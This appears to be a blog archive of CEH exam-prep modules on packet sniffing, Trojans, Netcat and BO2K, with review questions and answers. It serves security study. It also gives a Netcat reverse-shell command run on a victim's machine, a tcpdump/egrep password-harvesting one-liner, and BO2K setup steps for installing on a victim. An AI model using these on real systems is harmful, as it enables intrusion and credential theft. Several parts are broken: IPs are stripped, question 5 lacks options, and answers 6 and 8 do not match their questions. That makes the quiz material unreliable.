Category Archives: (F) CEH (PART B)

MODULE 8.4 Review Questions For SNIFFERS

1. On a switch, each switchport represents a ____________.


B. Broadcast domain

C. Host

D. Collision domain

2. Wireless access points function as a ____________.

A. Hub

B. Bridge

C. Router

D. Repeater

3. What mode must be configured to allow an NIC to capture all traffic on the wire?

A. Extended mode

B. 10/100

C. Monitor mode

D. Promiscuous mode

4. Which of the following prevents ARP poisoning?

A. ARP Ghost

B. IP DHCP Snooping

C. IP Snoop

D. DNSverf

5. Jennifer is a system administrator who is researching a technology that will secure network traffic from potential sniffing by unauthorized machines. Jennifer is not concerned with the future impact on legitimate troubleshooting. What technology can Jennifer implement?





6. MAC spoofing applies a legitimate MAC address to an unauthenticated host, which allows the attacker to pose as a valid user. Based on your understanding of ARP, what would indicate a bogus client?

A. The MAC address doesn’t map to a manufacturer.

B. The MAC address is two digits too long.

C. A reverse ARP request maps to two hosts.

D. The host is receiving its own traffic.

7. Bob is attempting to sniff a wired network in his first pen test contract. He sees only traffic from the segment he is connected to. What can Bob do to gather all switch traffic?

A. MAC flooding

B. MAC spoofing

C. IP spoofing

D. DOS attack

8. What technique funnels all traffic back to a single client, allowing sniffing from all connected hosts?

A. ARP redirection

B. ARP poisoning

C. ARP flooding

D. ARP partitioning

9. Which Wireshark filter displays only traffic from

A. ip.addr =!

B. ip.addr ne

C. ip.addr ==

D. ip.addr –

10. What common tool can be used for launching an ARP poisoning attack? A. Cain & Abel

B. Nmap

C. Scooter

D. Tcpdump

11. Which command launches a CLI version of Wireshark?

A. Wireshk

B. dumpcap
C. tshark

D. editcap

12. Jennifer is using tcpdump to capture traffic on her network. She would like to save the capture for later review. What command can Jennifer use?

A. tcpdump –r capture.log

B. tcpdump – l capture.log

C. tcpdump –t capture.log

D. tcpdump –w capture.log

13. What is the generic syntax of a Wireshark filter?

A. protocol.field operator value

B. field.protocol operator value

C. operator.protocol value field

D. protocol.operator value field

14. Tiffany is analyzing a capture from a client’s network. She is particularly interested in NetBIOS traffic. What port does Tiffany filter for?

A. 123

B. 139

C. 161

D. 110


1. D. Each switchport represents a collision domain, thereby limiting sniffing to only the clients residing on that port.

2. A. All wireless access points are essentially hubs in that they do not segregate traffic the way a traditional wired switch does.

3. D. An NIC must be configured to operate in promiscuous mode to capture all traffic on the network. More specifically, it allows the interface to capture both traffic that is intended for the host and traffic that is intended for other clients

. 4. B. IP DHCP Snooping can be used on Cisco devices to prevent ARP poisoning by validating IP-to-MAC mappings based on a saved database.

5. C. Jennifer can implement a form of encryption for the traffic that she wants to protect from sniffing. Secure Shell traffic would not be readable if captured by a sniffer; however, any legitimate network troubleshooting efforts would also prove more challenging because of packet encryption.

6. C. MAC spoofing results in duplicate MAC addresses on a network unless the compromised client has been bumped from its connection. Two IP addresses mapping to one MAC indicates a bogus client.

7. A. Bob can launch a MAC flooding attack against the switch, thereby converting the switch into a large hub. If successful, this will allow Bob to sniff all traffic passing through the switch.

8. B. ARP poisoning alters ARP table mappings to align all traffic to the attacker’s interface before traveling to the proper destination. This allows the attacker to capture all traffic on the network and provides a jumping-off point for future attacks.

9. C. The Wireshark operator == means equal to. In this scenario, using the == operator filters down to as the specific host to be displayed.

10. A. Cain & Abel is a well-known suite of tools used for various pen-testing functions such as sniffing, password cracking, and ARP poisoning.

11. C. The command for the CLI version of Wireshark is tshark.

12. D. Tcpdump uses the option –w to write a capture to a log file for later review. The option –r is used to read the capture file, or the capture can be opened in a GUI-based sniffer such as Wireshark.

13. A. Wireshark filters use the basic syntax of putting the protocol first followed by the field of interest, the operator to be used, and finally the value to look for (tcp .port == 23).

14. B. Tiffany looks for NetBIOS traffic on port 139. She can use the filter string tcp .port eq 139.

MODULE 8.3 Sniffing With TCPDUMP

Tcpdump is a commandline network analyzer tool or more technically a packet sniffer. It can be thought of as the commandline version of wireshark (only to a certain extent, since wireshark is much more powerful and capable).

As a commandline tool tcpdump is quite powerful for network analysis as filter expressions can be passed in and tcpdump would pick up only the matching packets and dump them.

In this tutorial we are going to learn to use tcpdump and how it can be used for network analysis. On ubunut for example it can be installed by typing the following in terminal

$ sudo apt-get install tcpdump

Tcpdump depends on libpcap library for sniffing packets. It is documented here.

For windows use the alternative called windump. It is compatible with tcpdump (in terms of usage and options). Download from

Basic sniffing

Lets start using tcpdump. The first simple command to use is tcpdump -n

$ sudo tcpdump -n
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on eth0, link-type EN10MB (Ethernet), capture size 65535 bytes
16:34:57.266865 IP > ICMP echo reply, id 19941, seq 1176, length 64
16:34:57.267226 IP > 23380+ PTR? (43)
16:34:57.274549 IP > 23380 1/4/2 PTR (195)
16:34:57.297874 IP > UDP, length 105

Why sudo ? Because tcpdump needs root privileges to be able to capture packets on network interfaces. On ubuntu prepending sudo to any command makes it run with superuser/root privileges. The -n parameter is given to stop tcpdump from resolving ip addresses to hostnames, which take look and not required right now.

Lets take a line from the above output to analyse.

16:34:57.267226 IP > 23380+ PTR? (43)

The first thing “16:34:57.267226” is the timestamp with microsecond precision. Next is the protocol of the packet called IP (stands for Internet protocol and it is under this protocol that most of the internet communication goes on). Next is the source ip address joined with the source port. Following next is the destination port and then some information about the packet.

Now lets increase the display resolution of this packet, or get more details about it. The verbose switch comes in handy. Here is a quick example

$ sudo tcpdump -v -n
tcpdump: listening on eth0, link-type EN10MB (Ethernet), capture size 65535 bytes
16:43:13.058660 IP (tos 0x20, ttl 54, id 50249, offset 0, flags [DF], proto TCP (6), length 40) > Flags [.], cksum 0x6d32 (correct), ack 1617156745, win 9648, length 0
16:43:13.214621 IP (tos 0x0, ttl 64, id 0, offset 0, flags [DF], proto ICMP (1), length 84) > ICMP echo request, id 19941, seq 1659, length 64
16:43:13.355334 IP (tos 0x20, ttl 54, id 48656, offset 0, flags [none], proto ICMP (1), length 84) > ICMP echo reply, id 19941, seq 1659, length 64
16:43:13.355719 IP (tos 0x0, ttl 64, id 0, offset 0, flags [DF], proto UDP (17), length 71) > 28650+ PTR? (43)
16:43:13.362941 IP (tos 0x0, ttl 251, id 63454, offset 0, flags [DF], proto UDP (17), length 223) > 28650 1/4/2 PTR (195)
16:43:13.880338 ARP, Ethernet (len 6), IPv4 (len 4), Request who-has tell, length 28
16:43:14.215904 IP (tos 0x0, ttl 64, id 0, offset 0, flags [DF], proto ICMP (1), length 84) > ICMP echo request, id 19941, seq 1660, length 64

Now with the verbose switch lots of additional details about the packet are also being displayed. And these include the ttl, id, tcp flags, packet length etc.

Getting the ethernet header (link layer headers)

In the above examples details of the ethernet header are not printed. Use the -e option to print the ethernet header details as well.

$ sudo tcpdump -vv -n -e
[sudo] password for enlightened: 
tcpdump: listening on eth0, link-type EN10MB (Ethernet), capture size 65535 bytes
17:57:27.218531 00:25:5e:1a:3d:f1 > 00:1c:c0:f8:79:ee, ethertype IPv4 (0x0800), length 98: (tos 0x20, ttl 54, id 53046, offset 0, flags [none], proto ICMP (1), length 84) > ICMP echo reply, id 19941, seq 6015, length 64
17:57:27.218823 00:1c:c0:f8:79:ee > 00:25:5e:1a:3d:f1, ethertype IPv4 (0x0800), length 85: (tos 0x0, ttl 64, id 0, offset 0, flags [DF], proto UDP (17), length 71) > [bad udp cksum 0x9cee -> 0xe5f6!] 23855+ PTR? (43)
17:57:27.226352 00:25:5e:1a:3d:f1 > 00:1c:c0:f8:79:ee, ethertype IPv4 (0x0800), length 269: (tos 0x0, ttl 251, id 10513, offset 0, flags [DF], proto UDP (17), length 255) > [udp sum ok] 23855 q: PTR? 1/4/4 PTR ns: NS NS4.GOOGLE.COM., NS NS2.GOOGLE.COM., NS NS1.GOOGLE.COM., NS NS3.GOOGLE.COM. ar: NS1.GOOGLE.COM. A, NS2.GOOGLE.COM. A, NS3.GOOGLE.COM. A, NS4.GOOGLE.COM. A (227)

Now the first thing after the timestamp is the source and destination mac address.

Sniffing a particular interface

In order to sniff a particular network interface we must specify it with the -i switch. First lets get the list of available interfaces using the -D switch.

$ sudo tcpdump -D
2.usbmon1 (USB bus number 1)
3.usbmon2 (USB bus number 2)
4.any (Pseudo-device that captures on all interfaces)

Next we can use the interface number of name with the -i switch to sniff the particular interface.

$ sudo tcpdump -i 1
$ sudo tcpdump -i eth0

Filtering packets using expressions

The next important feature of tcpdump as a network analysis tool is to allow the user to filter packets and select only those that match a certain rule or criteria. And like before this too is quite simple and can be learned easily. Lets take a few simple examples.

Selecting protocols

$ sudo tcpdump -n tcp

The above command will show only tcp packets. Similary udp or icmp can be specified.

Particular host or port

Expressions can be used to specify source ip, destination ip, and port numbers. The next example picks up all those packets with source address

$ sudo tcpdump -n 'src'
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on eth0, link-type EN10MB (Ethernet), capture size 65535 bytes
20:04:04.856379 IP > Flags [.], seq 2781603453:2781604873, ack 338206850, win 41850, length 1420
20:04:05.216372 IP > Flags [P.], seq 3980513010:3980513027, ack 2134949138, win 28400, length 17

Next example picks up dns request packets, either those packets which originate from local machine and go to port 53 of some other machine.

$ sudo tcpdump -n 'udp and dst port 53'
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on eth0, link-type EN10MB (Ethernet), capture size 65535 bytes
20:06:48.015359 IP > 41001+ A? (46)
20:06:50.842530 IP > 12380+ A? (59)

The above output shows the dns requests made by local system to the dns server port 53. Its all very intuitive and simple. Note the “and” which is used to combine multiple conditions. This is where the creativity begins, to write powerful expressions to analyse the network.

To display the FTP packets coming from to

$ sudo tcpdump 'src and dst and port ftp'

Note that the port number 21 has been specified by its name – ftp.

So similarly many different kinds of expressions can be developed to fit the needs of the network analyst and pick up matching packets.

Search the network traffic using grep

Grep can be used along with tcpdump to search the network traffic. Here is a very simple example

$ sudo tcpdump -n -A | grep -e 'POST'
[sudo] password for enlightened: 
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on eth0, link-type EN10MB (Ethernet), capture size 65535 bytes
E...=.@.@......e@.H..'.P(.o%~...P.9.PN..POST /blog/wp-admin/admin-ajax.php HTTP/1.1
E...c_@.@..=...e@.H..*.PfC<....wP.9.PN..POST /blog/wp-admin/admin-ajax.php HTTP/1.1
E.....@.@......e@.H...."g;.(.-,WP.9.Nj..POST /login/?login_only=1 HTTP/1.1

The above example detects packets with the string “POST” in them. It detects http post requests as shown.
The -A option displays the content of the packet in ascii text form, which is searchable using grep.

On windows the grep command is not available, but has an equivalent called find/findstr. Example usage

C:\tools>WinDump.exe -A | findstr "GET"
WinDump.exe: listening on \Device\NPF_{6019E682-FD40-4A54-BB75-9C2ACFA56CAA}
.....&....P..W.....P....k..GET /search?hl=en&sclient=psy-ab&q=asda&oq
.....&....P..[{..N.P...%-..GET /csi?v=3&s=web&action=&ei=LrmPUMrLNoHO
.P-%.}....P..$Ch..GET /subscribe?host_int=139535925&ns_map=2

So in the above example we used windump and searched the sniffed packet for the string “GET” (which mostly discover the http get requests).

So what is the idea behind searching packets. Well one good thing can be to sniff passwords.
Here is quick example to sniff passwords using egrep

tcpdump port http or port ftp or port smtp or port imap or port pop3 -l -A | egrep -i 'pass=|pwd=|log=|login=|user=|username=|pw=|passw=|passwd=|password=|pass:|user:|username:|password:|login:|pass |user ' --color=auto --line-buffered -B20


MODULE 8.2 Sniffing Password with Wireshark


Wireshark is the world’s foremost network protocol analyzer. It lets you see what’s happening on your network at a microscopic level. It is the de facto (and often de jure) standard across many industries and educational institutions.
This tutorial can be an angel and also devil in the same time, it depends to you who use this tutorial for which purpose…me as a writer of this tutorial just hope that all of you can use it in the right way , because I believe that no one from you want your password sniffed by someone out there so don’t do that to others too

Disclaimer – Our tutorials are designed to aid aspiring pen testers/security enthusiasts in learning new skills, we only recommend that you test this tutorial on a system that belongs to YOU. We do not accept responsibility for anyone who thinks it’s a good idea to try to use this to attempt to hack systems that do not belong to you
Requirements :

1. Wireshark Network Analyzer (
2. Network Card (Wi-Fi Card, LAN Card, etc) fyi : for wi-fi it should support promiscious mode

Step 1: Start Wireshark and capture traffic

In Kali Linux you can start Wireshark by going to

Application > Kali Linux > Top 10 Security Tools > Wireshark

In Wireshark go to Capture > Interface and tick the interface that applies to you. In my case, I am using a Wireless USB card, so I’ve selected wlan0.


Ideally you could just press Start button here and Wireshark will start capturing traffic. In case you missed this, you can always capture traffic by going back to Capture > Interface > Start


Step 2: Filter captured traffic for POST data

At this point Wireshark is listening to all network traffic and capturing them. I opened a browser and signed in a website using my username and password. When the authentication process was complete and I was logged in, I went back and stopped the capture in Wireshark.

when wee type in your username, password and press the Login button, it generates a a POST method (in short – you’re sending data to the remote server).

To filter all traffic and locate POST data, type in the following in the filter section

http.request.method == “POST”

See screenshot below. It is showing 1 POST event.


Step 3: Analyze POST data for username and password

Now right click on that line and select Follow TCP Steam


This will open a new Window that contains something like this:


So in this case,

username: sampleuser
password: e4b7c855be6e3d4307b8d6ba4cd4ab91
But hold on, e4b7c855be6e3d4307b8d6ba4cd4ab91 can’t be a real password. It must be a hash value.

to crack this password its simple just open new terminal window and type this :


and its looks like this:

  1. username: sampleuser
  2. password: e4b7c855be6e3d4307b8d6ba4cd4ab91:simplepassword

MODULE 8.1 Sniffing Tools

Sniffing tools are extremely common applications. A few interesting ones are listed here:


Wireshark One of the most widely known and used packet sniffers. Offers a tremendous number of features designed to assist in the dissection and analysis of traffic.


Tcpdump A well-known command-line packet analyzer. Provides the ability to intercept and observe TCP/IP and other packets during transmission over the network. Available at


WinDump A Windows port of the popular Linux packet sniffer tcpdump, which is a command-line tool that is great for displaying header information.


OmniPeek Manufactured by WildPackets, OmniPeek is a commercial product that is the evolution of the product EtherPeek.


Dsniff A suite of tools designed to perform sniffing with different protocols with the intent of intercepting and revealing passwords. Dsniff is designed for Unix and Linux platforms and does not have a complete equivalent on the Windows platform.


EtherApe A Linux/Unix tool designed to graphically display a system’s incoming and outgoing connections.


MSN Sniffer A sniffing utility specifically designed for sniffing traffic generated by the MSN Messenger application.


NetWitness NextGen Includes a hardware-based sniffer, along with other features, designed to monitor and analyze all traffic on a network; a popular tool in use by the FBI and other law enforcement agencies.



MODULE 8.0 SNIFFERS – Understanding Sniffers

Sniffers are utilities that you, as an ethical hacker, can use to capture and scan traffic moving across a network. Sniffers are a broad category that encompasses any utility that has the ability to perform a packet-capturing function.

Regardless of the build, sniffers perform their traffic-capturing function by enabling promiscuous mode on the connected network interface, thereby allowing the capture of all traffic, whether or not that traffic is intended for them.

Once an interface enters promiscuous mode, it doesn’t discriminate between traffic that is destined for its address; it picks up all traffic on the wire, thereby allowing you to capture and investigate every packet.

Sniffing can be active or passive in nature. Typically, passive sniffing is considered to be any type of sniffing where traffic is looked at but not altered in any way. Essentially, passive sniffing means listening only. In active sniffing, not only is traffic monitored, but it may also be altered in some way as determined by the attacking party.

Remember that a sniffer is not just a dumb utility that allows you to view only streaming traffic. A sniffer is a robust set of tools that can give you an extremely in-depth and granular view of what your (or their) network is doing from the inside out. That being said, if you really want to extrapolate all the juicy tidbits and clues of each packet, save the capture and review it when time allows. I prefer to review my 20,000 packets of captured data at my local coffee shop with a hot vanilla latte and a blueberry scone. Make it easy on yourself; your target is not going anywhere soon.

Before we go too much into sniffers, it is important to mention that there are also hardware protocol analyzers. These devices plug into the network at the hardware level and can monitor traffic without manipulating it. Typically these hardware devices are not easily accessible to most ethical hackers due to their enormous cost in many cases (some devices have price tags in the six-figure range).

How successful you are at the sniffing process depends on the relative and inherent insecurity of certain network protocols. Protocols such as the tried and true TCP/IP were never designed with security in mind and therefore do not offer much in this area. Several
protocols lend themselves to easy sniffing:

  • Telnet/rlogin Keystrokes, such as those including usernames and passwords, can be easily sniffed.
  • HTTP Designed to send information in the clear without any protection and thus a good target for sniffing.
  • Simple Mail Transfer Protocol (SMTP) Commonly used in the transfer of email, this protocol is efficient, but it does not include any protection against sniffing.
  • Network News Transfer Protocol (NNTP) All communication, including passwords and data, is sent in the clear.
  • Post Office Protocol (POP) Designed to retrieve email from servers, this protocol does not include protection against sniffing because passwords and usernames can be intercepted.
  • File Transfer Protocol (FTP) A protocol designed to send and receive files; all transmissions are sent in the clear.
  • Internet Message Access Protocol (IMAP) Similar to SMTP in function and lack of protection.



1.Which statement(s) defines malware most accurately?

  • A. Malware is a form of virus.
  • B. Trojans are malware.
  • C. Malware covers all malicious software.
  • D. Malware only covers spyware.

2.Which is/are a characteristic of a virus?

  • A. A virus is malware.
  • B. A virus replicates on its own.
  • C. A virus replicates with user interaction.
  • D. A virus is an item that runs silently.

3.A virus does not do which of the following?

  • A. Replicate with user interaction
  • B. Change configuration settings
  • C. Exploit vulnerabilities
  • D. Display pop-ups

4. Which of the following is/are true of a worm?

  • A. A worm is malware.
  • B. A worm replicates on its own.
  • C. A worm replicates with user interaction.
  • D. A worm is an item that runs silently.

5. What are worms typically known for?

  • A. Rapid replication
  • B. Configuration changes
  • C. Identity theft
  • D. DDoS

6. What command is used to listen to open ports with netstat?

  • A. netstat -an
  • B. netstat -ports
  • C. netstat -n
  • D. netstat -s

7. Which utility will tell you in real time which ports are listening or in another state?

  • A. Netstat
  • B. TCPView
  • C. Nmap
  • D. Loki

8. Which of the following is not a Trojan?

  • A. BO2K
  • B. LOKI
  • C. Subseven

9. What is not a benefit of hardware keyloggers?

  • A. Easy to hide
  • B. Difficult to install
  • C. Difficult to detect
  • D. Difficult to log

10. Which of the following is capable of port redirection?

  • A. Netstat
  • B. TCPView
  • C. Netcat
  • D. Loki

11. A Trojan relies on __________ to be activated.

  • A. Vulnerabilities
  • B. Trickery and deception
  • C. Social engineering
  • D. Port redirection

12. A Trojan can include which of the following?

  • A. RAT
  • B. TCP
  • C. Nmap
  • D. Loki

13. What is a covert channel?

  • A. An obvious method of using a system
  • B. A defined process in a system
  • C. A backdoor
  • D. A Trojan on a system

14. An overt channel is __________.

  • A. An obvious method of using a system
  • B. A defined backdoor process in a system
  • C. A backdoor
  • D. A Trojan on a system

15. A covert channel or backdoor may be detected using all of the following except __________.

  • A. Nmap
  • B. Sniffers
  • C. An SDK
  • D. Netcat

16. A remote access Trojan would be used to do all of the following except __________.

  • A. Steal information
  • B. Remotely control a system
  • C. Sniff traffic
  • D. Attack another system

17. A logic bomb has how many parts, typically?

  • A. One
  • B. Two
  • C. Three
  • D. Four

18. A logic bomb is activated by which of the following?

  • A. Time and date
  • B. Vulnerability
  • C. Actions
  • D. Events

19. A polymorphic virus __________.

  • A. Evades detection through backdoors
  • B. Evades detection through heuristics
  • C. Evades detection through rewriting itself
  • D. Evades detection through luck

20. A sparse infector virus __________.

  • A. Creates backdoors
  • B. Infects data and executables
  • C. Infects files selectively
  • D. Rewrites itself



  1.  B, C. Malware covers all types of malicious software, including viruses, worms, Trojans, spyware, adware, and other similar items.
  2.  A, C. Unlike a worm, a virus requires that a user interact with it or initiate replication in some manner.
  3.  D. Typically a virus does not display pop-ups. That is a characteristic of adware.
  4.  A, B. A worm replicates without user interaction.
  5.  A. Worms are typically known for extremely rapid replication rates once they are released into the wild.
  6.  A. Netstat -a or –an lists ports on a system that are listening in Windows.
  7.  B. TCPView lists ports and their statuses in real time.
  8.  D. TCPTROJAN is not a Trojan. All the other utilities on this list are different forms of Trojans.
  9.  B. Hardware keyloggers are not difficult to install on a target system.
  10.  C. Netcat can do port redirection.
  11.  C. A Trojan relies on social engineering to entice the victim to open or activate the payload.
  12.  A. A remote access Trojan (RAT) is a common payload to include in a Trojan.
  13.  C. A covert channel is a backdoor or unintended vulnerability on a system that may or may not be created through the use of a Trojan.
  14.  A. An overt channel is a mechanism on a system or process that is typically put in place by design and intended to be used a specific way.
  15.  C. A software development kit (SDK) is used to develop software but not to detect a covert channel.
  16.  C. Typically, a RAT is not used to sniff traffic, but it may be used to install software to perform this function.
  17.  B. A logic bomb comes in two parts: a trigger and a payload. The payload stays dormant until the trigger wakes it up.
  18.  A, C, D. A logic bomb may be activated by any of these options except the presence of a vulnerability.
  19.  C. A polymorphic virus evades detection through rewriting itself.
  20. C. A sparse infector evades detection by infecting only a handful or selection of files instead of all of them.

MODULE 7.9.5 Overt and Covert Channels

When you are working with Trojans and other malware, you need to be aware of covert and overt channels. As mentioned earlier in the chapter, the difference between the two is that an overt channel is put in place by design and represents the legitimate or intended way for the system or process to be used, whereas a covert channel uses a system or process in a way that it was not intended to be used.

The biggest users of covert channels that we have discussed are Trojans. Trojans are designed to stay hidden while they send information or receive instructions from another source. Using covert channels means the information and communication may be able to slip past detective mechanisms that are not designed or positioned to be aware of or look for such behavior.

Tools to exploit covert channels include the following:

Loki Originally designed to be a proof of concept on how ICMP traffic can be used as a covert channel. This tool is used to pass information inside ICMP echo packets, which can carry a data payload but typically do not. Because the ability to carry data exists but is not used, this can make an ideal covert channel.

ICMP Backdoor Similar to Loki, but instead of using Ping echo packets, it uses Ping replies.

007Shell Uses ICMP packets to send information, but goes the extra step of formatting the packets so they are a normal size.

B0CK Similar to Loki but uses Internet Group Management Protocol (IGMP).

Reverse World Wide Web (WWW) Tunneling Shell Creates covert channels through firewalls and proxies by masquerading as normal web traffic.

AckCmd Provides a command shell on Windows systems.

Another powerful way of extracting information from a victim’s system is to use a piece of technology known as a keylogger. Software in this category is designed to capture and report activity in the form of keyboard usage on a target system. When placed on a system, it gives the attacker the ability to monitor all activity on a system and reports back to the attacker. Under the right conditions, this software can capture passwords, confidential information, and other data.

Some of the keystroke recorders are these:

IKS Software Keylogger A Windows-based keylogger that runs in the background on a system at a very low level. Due to the way this software is designed and runs, it is very hard to detect using most conventional means. The program is designed to run at such a low level that it does not show up in process lists or through normal detection methods.

Ghost Keylogger Another Windows-based keylogger that is designed to run silently in the background on a system, much like IKS. The difference between this software and IKS
is that it can record activity to an encrypted log that can be emailed to the attacker.

Spector Pro Designed to capture keystroke activity, email passwords, chat conversations and logs, and instant messages.

Fakegina An advanced keylogger that is very specific in its choice of targets. This software component is designed to capture usernames and passwords from a Windows system. Specifically, it intercepts the communication between the Winlogon process and the logon GUI in Windows.

Netcat is a simple command-line utility available for Linux, Unix, and Windows platforms. It is designed to read information from connections using TCP or UDP and do simple port redirection on them as configured.

Let’s look at the steps involved to use Netcat to perform port redirection. The first step is for the hacker to set up what is known as a listener on their system. This prepares the attacker’s system to receive the information from the victim’s system. To set up a listener, the command is as follows:

nc -v -l -p 80

In this example, nc is run with the -v switch for verbose mode, which provides additional information; -l means to listen and -p tells the program to listen on a specific port.

After this, the attacker needs to execute the following command on the victim’s system to redirect the traffic to their system:

nc hackers_ip 80 -e “cmd.exe”

In this second command the desired IP is entered and then followed by a port number; the -e states that the executable following the switch is to be run on connect.

Once this is entered, the net effect is that the command shell on the victim’s system is at the attacker’s command prompt, ready for input as desired.

Of course, Netcat has some other capabilities, including port scanning and placing files on a victim’s system. Port scanning can be accomplished using the following command:

nc -v -z -w1 IPaddress <start port> – <ending port> 

The following is a list of options available for Netcat:

  • Nc –d Detaches Netcat from the console
  • Nc -l -p [port] Creates a simple listening TCP port; adding -u places it into UDP mode.
  • Nc -e [program] Redirects stdin/stdout from a program
  • Nc -w [timeout] Sets a timeout before Netcat automatically quits Program | nc Pipes program output to Netcat
  • Nc | program Pipes Netcat output to a program
  • Nc -h Displays help options
  • Nc -v Puts Netcat into verbose mode
  • Nc -g or nc -G Specifies source routing flags
  • Nc -t Used for Telnet negotiation
  • Nc -o [file] Hex-dumps traffic to a file.
  • Nc -z Used for port scanning without transmitting data

MODULE: 7.9.4 Trojan Construction Kits

Much as for viruses and worms, several construction kits are available that allow for the rapid creation and deployment of Trojans. The availability of these kits has made designing and deploying malware easier than ever before:

Trojan Construction Kit One of the best examples of a relatively easy-to-use but potentially destructive tool. This kit is command-line based, which may make it a little less accessible to the average person, but it is nonetheless very capable in the right hands. With a little effort, it is possible to build a Trojan that can engage in destructive behavior such as destroying partition tables, master boot records (MBRs), and hard drives.

Senna Spy Another Trojan-creation kit that provides custom options, such as file transfer, executing DOS commands, keyboard control, and list and control processes.

Stealth Tool A program used not to create Trojans but to assist them in hiding. In practice, this tool is used to alter the target file by moving bytes, changing headers, splitting files, and combining files.


Many attackers gain access to their target system through a backdoor. The owner of a system compromised in this way may have no indication that someone else is using the
system. When implemented, a backdoor typically achieves one or more of the following key goals:

  • Lets an attacker access a system later by bypassing any countermeasures the system owner may have placed.
  • Provides the ability to gain access to a system while keeping a low profile. This allows an attacker to access a system and circumvent logging and other detective methods
  • . Provides the ability to access a system with minimal effort in the least amount of time. Under the right conditions, a backdoor lets an attacker gain access to a system without having to rehack.

Some common backdoors that are placed on a system are of the following types and purposes:

  • Password-cracking backdoor—Backdoors of this type rely on an attacker uncovering and exploiting weak passwords that have been configured by the system owner.
  • Process-hiding backdoor—An attacker who wants to stay undetected for as long as possible typically chooses to go the extra step of hiding the software they are running. Programs such as a compromised service, a password cracker, sniffers, and rootkits are items that an attacker will configure so as to avoid detection and removal. Techniques include renaming a package to the name of a legitimate program and altering other files on a system to prevent them from being detected and running.

Once a backdoor is in place, an attacker can access and manipulate the system at will.



MODULE 7.9.3 Distributing Trojans

Once a Trojan has been created, you must address how to get it onto a victim’s system. For this step, many options are available, including tools known as wrappers.

Using Wrappers to Install Trojans

Using wrappers, attackers can take their intended payload and merge it with a harmless executable to create a single executable from the two. Some more advanced wrapper-style programs can even bind together several applications rather than just two. At this point, the new executable can be posted in a location where it is likely to be downloaded

Consider a situation in which a would-be attacker downloads an authentic application from a vendor’s website and uses wrappers to merge a Trojan (BO2K) into the application before posting it on a newsgroup or other location. What looks harmless to the downloader is actually a bomb waiting to go off on the system. When the victim runs the infected software, the infector installs and takes over the system.

Some of the better-known wrapper programs are the following:

  • EliteWrap is one of the most popular wrapping tools, due to its rich feature set that includes the ability to perform redundancy checks on merged files to make sure the process went properly and the ability to check if the software will install as expected. The software can be configured to the point of letting the attacker choose an installation directory for the payload. Software wrapped with EliteWrap can be configured to install silently without any user interaction.
  • Saran Wrap is specifically designed to work with and hide Back Orifice. It can bundle Back Orifice with an existing program into what appears to be a standard program using Install Shield.
  • Trojan Man merges programs and can encrypt the new package in order to bypass antivirus programs.
  • Teflon Oil Patch is designed to bind Trojans to a specified file in order to defeat Trojan-detection applications.
  • Restorator was designed with the best of intentions but is now used for less-thanhonorable purposes. It can add a payload to, for example, a seemingly harmless screen saver, before it is forwarded to the victim.
  • Restorator was designed with the best of intentions but is now used for less-thanhonorable purposes. It can add a payload to, for example, a seemingly harmless screen saver, before it is forwarded to the victim.


MODULE: 7.9.2 An In-Depth Look at BO2K

Whether you consider it a Trojan or a remote administrator tool, the capabilities of BO2K are fairly extensive for something of this type. This list of features is adapted from the manufacturer’s website:

  • Address book–style server list
  • Functionality that can be extended via the use of plug-ins
  • Multiple simultaneous server connections
  • Session-logging capability
  • Native server support
  • Keylogging capability
  • Hypertext Transfer Protocol (HTTP) file system browsing and transfer
  • Microsoft Networking file sharing
  • Remote registry editing
  • File browsing, transfer, and management
  • Plug-in extensibility Remote upgrading, installation, and uninstallation
  • Network redirection of Transfer Control Protocol/Internet Protocol (TCP/IP) connections
  • Ability to access console programs such as command shells through Telnet
  • Multimedia support for audio/video capture and audio playback
  • Windows NT registry passwords and Win9x screen saver password dumping
  • Process control, start, stop, and list Multiple client connections over any medium
  • GUI message prompts

BO2K is a next-generation tool that was designed to accept customized, specially designed plug-ins. It is a dangerous tool in the wrong hands. With the software’s ability to be configured to carry out a diverse set of tasks at the attacker’s behest, it can be a devastating tool.

BO2K consists of two software components: a client and a server. To use the BO2K server, the configuration is as follows:

  1.  Start the BO2K Wizard, and click Next when the wizard’s splash screen appears.
  2. When prompted by the wizard, enter the server executable to be edited.
  3. Choose the protocol over which to run the server communication. The typical choice is to use TCP as the protocol, due to its inherent robustness. UDP is typically used if a firewall or other security architecture needs to be traversed.
  4.  The next screen asks what port number will be used. Port 80 is generally open, and so it’s most often used, but you can use any open port.
  5.  In the next screen, enter a password that will be used to access the server. Note that passwords can be used, but you can also choose open authentication—that means anyone can gain access without having to supply credentials of any kind.
  6.  When the wizard finishes, the server-configuration tool is provided with the information you entered.
  7. The server can be configured to start when the system starts up. This allows the program to restart every time the system is rebooted, preventing the program from becoming unavailable.
  8.  Click Save Server to save the changes and commit them to the server.

Once the server is configured, it is ready to be installed on the victim’s system.

No matter how the installation is to take place, the only application that needs to be run on the target system is the BO2K executable. After this application has run, the previously configured port is open on the victim’s system and ready to accept input from the attacker.

The application also runs an executable file called Umgr32.exe and places it in the Windows system32 folder. In addition, if you configure the BO2K executable to run in stealth mode, it does not show up in Task Manager—it modifies an existing running process to act as its cover. If stealth was not configured, the application appears as a Remote Administration Service.

The attacker now has a foothold on the victim’s system.